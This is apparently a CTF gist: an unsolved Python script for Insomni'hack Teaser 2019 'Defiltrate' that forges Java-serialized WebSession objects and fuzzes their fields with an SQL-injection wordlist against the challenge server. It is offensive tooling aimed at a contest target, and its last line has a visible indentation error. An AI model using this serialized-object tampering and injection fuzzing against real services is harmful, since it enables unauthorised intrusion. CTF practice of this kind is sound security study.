@SakiiR
Created January 20, 2020 10:14
Insomni'hack Teaser 2019 - Defiltrate part 1 - Unsolved
#!/usr/bin/env python
# @SakiiR
from struct import pack
import requests
import base64
"""
00000000: aced 0005 7372 000a 5765 6253 6573 7369 ....sr..WebSessi
00000010: 6f6e 0000 0000 0000 0001 0200 044c 000c on...........L..
00000020: 6d5f 6236 3450 6179 6c6f 6164 7400 124c m_b64Payloadt..L
00000030: 6a61 7661 2f6c 616e 672f 5374 7269 6e67 java/lang/String
00000040: 3b4c 0007 6d5f 6c6f 6769 6e71 007e 0001 ;L..m_loginq.~..
00000050: 4c00 0a6d 5f70 6173 7377 6f72 6471 007e L..m_passwordq.~
00000060: 0001 4c00 0b6d 5f73 6573 7369 6f6e 4944 ..L..m_sessionID
00000070: 7100 7e00 0178 7074 0000 7400 0561 646d q.~..xpt..t..adm
00000080: 696e 7400 1549 206c 6f76 6520 7069 6e6b int..I love pink
00000090: 2070 6f6e 6965 7320 3c33 7400 0234 32 ponies <3t..42
"""
PROXIES = {"http": "127.0.0.1:8080", "https": "127.0.0.1:8080"}
PINKY = "f516c240ce6b4ea785ffd3c9a816fb42"
def do(p):
    """POST one serialized session ``p`` to the challenge endpoint.

    The request goes through the local intercepting proxy configured in
    ``PROXIES``; certificate verification is disabled (``verify=False``)
    because that proxy terminates TLS, so this must never be reused against
    anything but a proxied local setup.  The hard-coded ``PINKY`` session
    cookie is attached, and redirects are not followed so the caller sees
    the raw status code of the first response.

    Args:
        p: value sent as the ``VIEW`` form field (the output of ``payload``).

    Returns:
        The ``requests.Response`` of the POST.
    """
    browser_headers = {
        "Cookie": "PINKYID=%s" % PINKY,
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
        "Accept-Language": "fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3",
        "Accept-Encoding": "gzip, deflate",
    }
    form = {"VIEW": p, "get": "./malware_activity.pcapng", "rm": ""}
    response = requests.post(
        "https://defiltrate.insomnihack.ch/",
        verify=False,
        proxies=PROXIES,
        headers=browser_headers,
        data=form,
        allow_redirects=False,
    )
    return response
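def payload(username, password, session_id, b64payload):
    """Serialize a ``WebSession`` Java object and return it base64-encoded.

    The fixed prefix is the stream header, class descriptor and field
    descriptors of ``WebSession``, copied byte-for-byte from the reference
    capture at the top of the file (offsets 0x00-0x77).  The four arguments
    are then written as ``TC_STRING`` (0x74) values in the order the class
    descriptor declares its fields: m_b64Payload, m_login, m_password,
    m_sessionID.

    All four arguments must be ``bytes``: the original code concatenated a
    ``str`` tag (``"\\x74"``) into the byte string, which raises ``TypeError``
    on Python 3 before anything is sent.

    Args:
        username: value of the ``m_login`` field.
        password: value of the ``m_password`` field.
        session_id: value of the ``m_sessionID`` field.
        b64payload: value of the ``m_b64Payload`` field.

    Returns:
        ``bytes`` holding the base64 encoding of the serialized object.

    Raises:
        ValueError: if any field is longer than 65535 bytes, because the
            string length prefix is only two bytes wide.
        TypeError: if a field is not ``bytes``.
    """

    def sz(txt):
        """Return ``txt`` prefixed with its big-endian 2-byte length."""
        # The previous ">i"[2:4] form silently wrapped lengths >= 0x10000;
        # fail loudly instead of emitting a corrupt record.
        if len(txt) > 0xFFFF:
            raise ValueError(
                "field too long for a 2-byte length prefix: %d bytes" % len(txt)
            )
        return pack(">H", len(txt)) + txt

    # Stream header (STREAM_MAGIC/STREAM_VERSION), class descriptor and the
    # four field descriptors; ends with the TC_STRING tag of the first field.
    header = (
        b"\xac\xed\x00\x05\x73\x72\x00\x0a\x57\x65\x62\x53\x65\x73\x73\x69"
        b"\x6f\x6e\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x04\x4c\x00\x0c"
        b"\x6d\x5f\x62\x36\x34\x50\x61\x79\x6c\x6f\x61\x64\x74\x00\x12\x4c"
        b"\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67"
        b"\x3b\x4c\x00\x07\x6d\x5f\x6c\x6f\x67\x69\x6e\x71\x00\x7e\x00\x01"
        b"\x4c\x00\x0a\x6d\x5f\x70\x61\x73\x73\x77\x6f\x72\x64\x71\x00\x7e"
        b"\x00\x01\x4c\x00\x0b\x6d\x5f\x73\x65\x73\x73\x69\x6f\x6e\x49\x44"
        b"\x71\x00\x7e\x00\x01\x78\x70\x74"
    )
    # The header already carries the tag for the first field, so only the
    # remaining three fields need their own 0x74 tag (bytes, not str).
    fields = b"".join(
        [
            sz(b64payload),
            b"\x74",
            sz(username),
            b"\x74",
            sz(password),
            b"\x74",
            sz(session_id),
        ]
    )
    return base64.b64encode(header + fields)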
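def main(
    wordlist="/home/sakiir/workspace/wordlists/SecLists/Fuzzing/SQLi/Generic-SQLi.txt",
):
    """Send every line of ``wordlist`` as all four ``WebSession`` fields.

    The file is read in binary mode because ``payload`` needs ``bytes``;
    each line is used unchanged as username, password, session id and
    embedded payload at once.  The loop stops at the first response whose
    status is not 301, which is presumably the deviation the script is
    watching for.  Blank lines are sent as empty fields, as before.

    Args:
        wordlist: path of the file whose lines are the candidate values
            (defaults to the author's local SecLists copy).
    """
    with open(wordlist, "rb") as f:
        candidates = f.read().splitlines()
    for candidate in candidates:
        print(candidate)
        r = do(payload(candidate, candidate, candidate, candidate))
        # Anything other than the usual 301 is reported and ends the run.
        if r.status_code != 301:
            print("lol !")
            return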
if __name__ == "__main__":
main()